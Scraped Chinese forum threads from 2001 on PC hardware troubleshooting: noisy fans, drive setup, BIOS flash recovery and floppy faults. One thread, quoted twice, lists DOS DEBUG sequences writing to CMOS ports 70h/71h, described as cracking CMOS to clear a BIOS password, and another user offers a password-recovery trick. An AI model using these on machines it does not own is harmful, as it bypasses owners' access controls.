 发表于 2001-12-17 18:13:37 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
进bois看看，你的是什么主板？能看cpu吗？是什么型号的 bois，是ami还是award的，响几下？你最好把你的情况说清楚点，好判断~

WINDFLASH
::浅紫色FORUM::
freedog

初级用户
积分：0
发帖：21
来自：
注册：2001-12-14
 发表于 2001-12-17 18:22:48 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP
不会是风扇吧！现在冷了！润滑油凝固了！

I am a freedog！
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-17 20:12:45 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
就是风扇啦
换一个就好了

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-17 20:56:03 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
赵鹏在上个帖子中说
引用:
就是风扇啦
换一个就好了

和和
这么肯定?

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
嘿嘿

坏笑
积分：414
发帖：559
来自：
注册：2001-10-06
 发表于 2001-12-18 10:52:21 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
你说的启动完是什么意思呢，到哪里才算启动完呢，不明白，希望能讲清楚点

如果刚开机就是黑屏的话最好能说说开机时的响声，如果有嘀嘀响的一般是内存和显卡的事，如果没有响声，就可能是CPU或电源的事。

缘是天定,份在人为.
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2001-12-18 11:55:18 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
从按下power到进入windows,声音低沉,不是硬件的报警声

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2001-12-18 13:01:27 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
呵呵，不用试了，我的机器也是这样，开机的时候有异常响声，不是硬件报警，而是什么碰撞摩擦的声音，过一会就好了。经过我仔细的观察，靠！就是CPU风扇运转不正常所致！也许是风扇中间的滚珠老化的原因（谁叫我开始没钱买个好点的！穷啊！……）换一个风扇，一切搞掂！^_^上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
上一贴 | 下一贴
快速回复 主题：最近几天开机是机器出现异响
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


请问什么是HUB？ - 经 典 论 坛

计算机技术
请问什么是HUB？

上一贴 | 下一贴
发表人 | 主题: 请问什么是HUB？
moonbaby526 初级用户 积分：94 发帖：93 来自：上海 注册：2001-06-24 | 发表于 2001-12-18 19:09:02 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 收藏该主题供以后查看 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP 帮同学问的，希望各位尽快答复，谢谢！ 可以不在乎，才能对别人在乎。
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-18 19:28:48 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 就是集线器 负责把多台电脑用网线连接在一起 形成网络 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 主题：请问什么是HUB？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


两按键鼠标可当作三键用？ - 经 典 论 坛

计算机技术
两按键鼠标可当作三键用？

上一贴 | 下一贴
发表人 | 主题: 两按键鼠标可当作三键用？
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 13:15:03 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 收藏该主题供以后查看 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 骗人！某人说，在任意可编辑文本的窗口中，同时按下两键可以代替三键鼠标的滑轮的滚动翻页作用， 可我试了一下，没什么反应！！你有什么方法？ 活到老 学不了
POPOEVER N个蓝色大泡泡 版主 积分：22065 发帖：6045 来自：Keyframe 注册：2000-07-17 | 发表于 2001-12-20 13:49:49 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP 是说这里论坛的页面吧，双击鼠标左键！ XTree 无可救药地活着，睡眼朦胧地醒着 世界杯决赛那天我过30岁生日，不冲突吧... Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 14:15:09 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 不是指这里。比如是在一般浏览较多网页内容需要下移的情况。起到代替鼠标中间轮的作用。 活到老 学不了
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-20 17:17:52 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 需要下载小程序吗？ 活到老 学不了
POPOEVER N个蓝色大泡泡 版主 积分：22065 发帖：6045 来自：Keyframe 注册：2000-07-17 | 发表于 2001-12-20 17:35:43 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP Ctrl+上下方向键 XTree 无可救药地活着，睡眼朦胧地醒着 世界杯决赛那天我过30岁生日，不冲突吧... Blueidea Web Team Moderator Of DW & JS Forum Chief Police Officer
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-21 08:31:08 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 学不如直接用上下键。 原来听说同时按左右两键，便出现一个上下两方向箭头，鼠标向下或向下移，便可翻动页面了。本想省钱不买三键的，看来省不了。 活到老 学不了
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-21 12:54:50 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 有这样的程序 你可以去 http://www.logitech.com.cn/service/download/mw_download_forXP.htm 下载全球著名的输入设备商罗技公司的鼠标驱动程序 驱动程序可以应用在非罗技生产的鼠标上 可以定义同时按两键产生第三键的效果 还可以出现增强菜单等 很好用的驱动 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 主题：两按键鼠标可当作三键用？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


找不到光驱了 - 经 典 论 坛

计算机技术
找不到光驱了

上一贴 | 下一贴
发表人 | 主题: 找不到光驱了
sgilb 高级用户 积分：187 发帖：76 来自： 注册：2001-09-16 | 发表于 2001-12-21 21:56:07 按此观看sgilb的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给sgilb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sgilb的IP 用启动盘启动后，光驱是E盘可以找到，但里面的文件不是盘里的内容，到底怎么找到光驱啊，请帮我分析分析，谢谢！
箫若 初级用户 积分：12 发帖：7 来自： 注册：2001-11-17 | 发表于 2001-12-21 22:04:06 按此观看箫若的个人资料 按此发邮件给箫若 访问箫若的主页 发送悄悄话给箫若 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看箫若的IP 正常的来说，用启动盘启动后有一个虚拟的驱动器，光驱的盘符可以往下找一找。 第一，检查启动盘是否有IDE的驱动程序，如果有，驱动是否正常。 第二，检查驱动器的盘符是否足够用，如果不够，加入。
yuzhiqing 终级用户 积分：747 发帖：439 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-21 22:12:20 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 你的光驱e是虚拟的，真正的盘符可能是f，这个在于你的dos启动有没有光驱的驱动程序了！~ WINDFLASH ::浅紫色FORUM::
JILL 终级用户 积分：590 发帖：180 来自：沈阳市 注册：2001-12-10 | 发表于 2001-12-21 22:12:29 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP 你是在DOS下启动的, 电脑告诉你光驱盘符是E, E: + ENTER 进入E盘下 DIR /W 显示下看见E盘的内容了吗? 如果没有,则可能是你安装了虚拟光驱,上下的盘符找一下吧! 誓与WIN2000共存
上一贴 | 下一贴
快速回复 主题：找不到光驱了
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


问题 - 经 典 论 坛

计算机技术
问题

上一贴 | 下一贴
发表人 | 主题: 问题
2000banker 初级用户 积分：23 发帖：3 来自：GuiYang 注册：2001-12-07 | 发表于 2001-12-21 11:55:38 按此观看2000banker的个人资料 按此发邮件给2000banker 收藏该主题供以后查看 发送悄悄话给2000banker 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2000banker的IP 请问笔记本电脑的数字小键盘如何击活？ 海阔天高什么鸟都可以飞，嗯！
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-21 13:10:15 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 找位于右上方的NumLock键 应该是蓝色或是紫色的 然后注意观察因为按键上 标有同样颜色数字的按键 那些现在就是数字键 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
上一贴 | 下一贴
快速回复 主题：问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


关于大硬盘的问题 - 经 典 论 坛

计算机技术
关于大硬盘的问题

上一贴 | 下一贴
发表人 | 主题: 关于大硬盘的问题
踏雪金鹰 超级用户 积分：370 发帖：301 来自：****鹰岛**** 注册：2001-04-04 | 发表于 2001-12-27 16:16:46 按此观看踏雪金鹰的个人资料 按此发邮件给踏雪金鹰 访问踏雪金鹰的主页 踏雪金鹰 的 oicq 是7581975,查看 7581975 的资料 收藏该主题供以后查看 发送悄悄话给踏雪金鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看踏雪金鹰的IP 我的PC是HP 的，VECTRA系列的 原装的是8G的硬盘，今天单位给计算机胜迹，分到40G的，我想把他变成一个从盘， 我的硬盘数据线只有一个接口，光区数据线有2个借口的 我应该怎么设置呢 我在等待你的回复！
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-27 16:37:02 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP PC硬盘启动的顺序是 1主、1从、2主、2从 （可察看主板上的IDE接口标示，有的是 IDE0 和 IDE1，有的是 IDE 1和 IDE 2） 你的8G应该是接在1主上 你的光驱应该是接在2主上 那么你现在可以把40G的跳成从接在光驱的IDE线上（有可能需要再跳光驱为主，因为光驱可能跳自动） 如果你想把硬盘都接在一起那么你可以把8G和光驱的IDE线调换一下 不过我建议你把40G跳主接在1主上 8G拿去做从 毕竟现在的硬盘比起当年的要可靠的多 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
踏雪金鹰 超级用户 积分：370 发帖：301 来自：****鹰岛**** 注册：2001-04-04 | 发表于 2001-12-27 16:40:53 按此观看踏雪金鹰的个人资料 按此发邮件给踏雪金鹰 访问踏雪金鹰的主页 踏雪金鹰 的 oicq 是7581975,查看 7581975 的资料 发送悄悄话给踏雪金鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看踏雪金鹰的IP 已经按照做了，结果是死机 好象应该去升级BOIS，可是不知道怎么办 我在等待你的回复！
limitstudio 初级用户 积分：0 发帖：5 来自：沈阳@辽宁 注册：2001-12-14 | 发表于 2001-12-28 06:40:53 按此观看limitstudio的个人资料 按此发邮件给limitstudio 访问limitstudio的主页 limitstudio 的 oicq 是8025817,查看 8025817 的资料 发送悄悄话给limitstudio 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看limitstudio的IP 你的机器是什么时候的呀？ 老板子不支持大硬盘的！！！ 没有我你怎么办？ 你的泪水谁为你擦干？ 谁帮你打伞？ 安慰你心烦？ 失眠的夜你最怕孤单！
上一贴 | 下一贴
快速回复 主题：关于大硬盘的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


BIOSaward命令求解 - 经 典 论 坛

计算机技术
BIOSaward命令求解

上一贴 | 下一贴
发表人 主题: BIOSaward命令求解
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-21 19:15:45 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 收藏该主题供以后查看 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
就是自动恢复的一行,哪位兄弟那有,给我一下,谢谢

小心者,心小也!
yuzhiqing

终级用户
积分：747
发帖：439
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-21 21:01:31 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

WINDFLASH
::浅紫色FORUM::
lytkd

终级用户
积分：1125
发帖：331
来自：China
注册：2000-12-02
 发表于 2001-12-21 22:14:50 按此观看lytkd的个人资料 按此发邮件给lytkd 发送悄悄话给lytkd 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lytkd的IP
yuzhiqing在上个帖子中说
引用:
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

放电？？残忍
破解CMOS的debug用法目前我知道有5种。基本上问题可以解决了。
前提条件>>机器没有设置开机密码(如果设置了你不知道的密码的话,你根本就无法开机,更别提破解了,可以放电)

在dos提示符下输入
debug 回车

---------------
-O 70 16
-O 71 16
-Q
---------------
-O 70 11
-O 71 FF
-Q

---------------
-O 70 10
-O 71 10
-Q
---------------
-O 70 23
-O 71 34
-Q

---------------
-O 70 16
-O 71 FF
-Q

-----------------------------
-O ：将一个字节的数据送往I/O端口
70h是个只写的端口，设置CMOS中数据的读写地址，
端口71h就是在70h设置的地址进行读写的端口，写入数据11.
-Q :是退出debug的通用命令。
它有很多种写法，用其他高级语言一样可以用。
debug的用处非常大，这只是其应用的一个很小的部分。

注意:改完后,进入Cmos,记得要load默认值哦,不然无法开机的(个别情况)

流浪的小奀
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-21 22:46:42 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
我是刷错了BIOS啊,不是设置错了.哎................就是用award自动刷回原来的BIN啊,假如我原来的是old.bin,请问用什么命令可以自动刷?

急!!!!!!!!!!!!!!!!!!!

小心者,心小也!
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2001-12-22 00:03:18 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
升级BIOS失败?启动系统读不读软驱?如果读,那还有救.
找一个ISA显卡,就可以点亮了,如果没有ISA显卡,就按以下步骤试试.
1.作一张DOS启动盘,只保留三个文件,一定不能有config.sys和autoexec.bat这两个文件.
2.将awdflash.exe和old.bin文件copy的软盘中.
3.在启动盘中建立一个autoexec.bat文件,打入以下内容:
awdflash.exe old.bin/sn/py
4.用此软盘启动系统,就会自动刷新了,等软驱灯不亮了,过一会儿就可以重新启动.
能否成功,就看你的运气了.

UFO Bulletin Board ====> 不明飞行物
赵鹏

初级用户
积分：9
发帖：1196
来自：福建福州
注册：2001-04-02
 发表于 2001-12-22 02:53:22 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
刷BIOS失败的话
可以使用热插拔法恢复

前提条件：
1 准备好存放自己原先的BIOS的程序盘，此盘必须可引导机器启动
2 准备一个其它的接口相同的BIOS芯片

遵循如下步骤开始：
1 用新的BIOS芯片更换自己主板上的（不要插得太紧），并设置为A:优先启动
2 用软盘启动完成后，拔除新的BIOS芯片并换上原来自己的（轻手轻脚一些）
3 执行软盘上的自己的BIOS写入程序，这样就可以把内容重新写入BIOS芯片
OK

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
小心

高级用户
积分：238
发帖：315
来自：北京
注册：2001-04-06
 发表于 2001-12-22 11:48:45 按此观看小心的个人资料 该用户不允许显示它的电子邮件 访问小心的主页 小心 的 oicq 是929431,查看 929431 的资料 发送悄悄话给小心 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小心的IP
都是技嘉的@BIOS搞的！！！！没想到一连就不知道给我刷了什么东东．．．．．．．．．
哎．．．．．．．

小心者,心小也!
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-22 14:47:36 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
先找一台好的机器，模拟一下过程（注意是模拟），把每个步骤记下来，包括估算等待的时间，然后在自己的机器上恢复吧。我就是这样干的。
razor

初级用户
积分：30
发帖：15
来自：杭州
注册：2001-12-07
 发表于 2001-12-22 16:23:07 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP
其实最安全的还是上网去把自己的那个主板的 bios下下来，再拿到电子市场去用编程器刷一下，大概30员吧

我是Razor
失落

初级用户
积分：0
发帖：1
来自：中国、广东、珠海
注册：2001-12-08
 发表于 2001-12-27 23:20:55 按此观看失落的个人资料 该用户不允许显示它的电子邮件 失落 的 oicq 是9212242,查看 9212242 的资料 发送悄悄话给失落 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看失落的IP
lytkd在上个帖子中说
引用:
yuzhiqing在上个帖子中说
引用:
load bios defaults ，我的是ami的，可能不一样，大概一样吧，最笨的方法是放bois的电 ;)

放电？？残忍
破解CMOS的debug用法目前我知道有5种。基本上问题可以解决了。
前提条件>>机器没有设置开机密码(如果设置了你不知道的密码的话,你根本就无法开机,更别提破解了,可以放电)

在dos提示符下输入
debug 回车

---------------
-O 70 16
-O 71 16
-Q
---------------
-O 70 11
-O 71 FF
-Q

---------------
-O 70 10
-O 71 10
-Q
---------------
-O 70 23
-O 71 34
-Q

---------------
-O 70 16
-O 71 FF
-Q

-----------------------------
-O ：将一个字节的数据送往I/O端口
70h是个只写的端口，设置CMOS中数据的读写地址，
端口71h就是在70h设置的地址进行读写的端口，写入数据11.
-Q :是退出debug的通用命令。
它有很多种写法，用其他高级语言一样可以用。
debug的用处非常大，这只是其应用的一个很小的部分。

注意:改完后,进入Cmos,记得要load默认值哦,不然无法开机的(个别情况)

我有一个更好的方法，它不会删去原来的密码但就可以得到它的呢！！！
想知，问我吧：）

其实我失落并不是我有什么不开心，而是我不能学懂所有的技巧！！
上一贴 | 下一贴
快速回复 主题：BIOSaward命令求解
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


紧急求助：软驱灯长亮不熄！！！！ - 经 典 论 坛

计算机技术
紧急求助：软驱灯长亮不熄！！！！

上一贴 | 下一贴
发表人 | 主题: 紧急求助：软驱灯长亮不熄！！！！
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-27 13:43:18 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 收藏该主题供以后查看 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 最近我的软驱灯不知怎么从按power按纽时就亮，进入window了，所有程序都启动完毕， 还是亮着，不闪动！不知怎么回事，这样亮下去，我的软驱岂不是要费了，我于是把软驱 电源插头拔了。求助各种大侠帮助我一下！小生在此谢谢了！谢谢！ 活到老 学不了
赵鹏 初级用户 积分：9 发帖：1196 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-27 16:13:18 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 这种现象很可能是软驱的信号线接反了 有些软驱的信号线是反接的 你是不是拆过机啊 如果不是那就是软驱坏了 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
嘿嘿 坏笑 积分：414 发帖：559 来自： 注册：2001-10-06 | 发表于 2001-12-29 13:06:52 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP 亮的时候软驱响吗，如果不响应该就是灯的线接错了。 缘是天定,份在人为.
上一贴 | 下一贴
快速回复 主题：紧急求助：软驱灯长亮不熄！！！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


软区疯了？？！！！ - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
软区疯了？？！！！

上一贴 | 下一贴
发表人 | 主题: 软区疯了？？！！！
宇宙星云 终级用户 积分：474 发帖：305 来自：广州 注册：2000-12-13 | 发表于 2001-12-29 15:27:07 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP 朋友一网吧专用来排版打印的机器软区最近老是发生一怪问题： 无论打开那一张软盘，都显示最先一张盘的内容，刷新也没用，只有重启系统才可以恢复正常，请问怎么回事？？？难道要重新装系统？ ┏━━┓∴· oooO Oooo°∴┏━━┓ ┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃ ┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃ ┗━━┛★．° \_) (_/·．★┗━━┛
DayinNightout 超级用户 积分：345 发帖：152 来自：CCF 注册：2000-12-18 | 发表于 2001-12-29 15:43:15 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP 换根软区线试试 木有签名#@$%
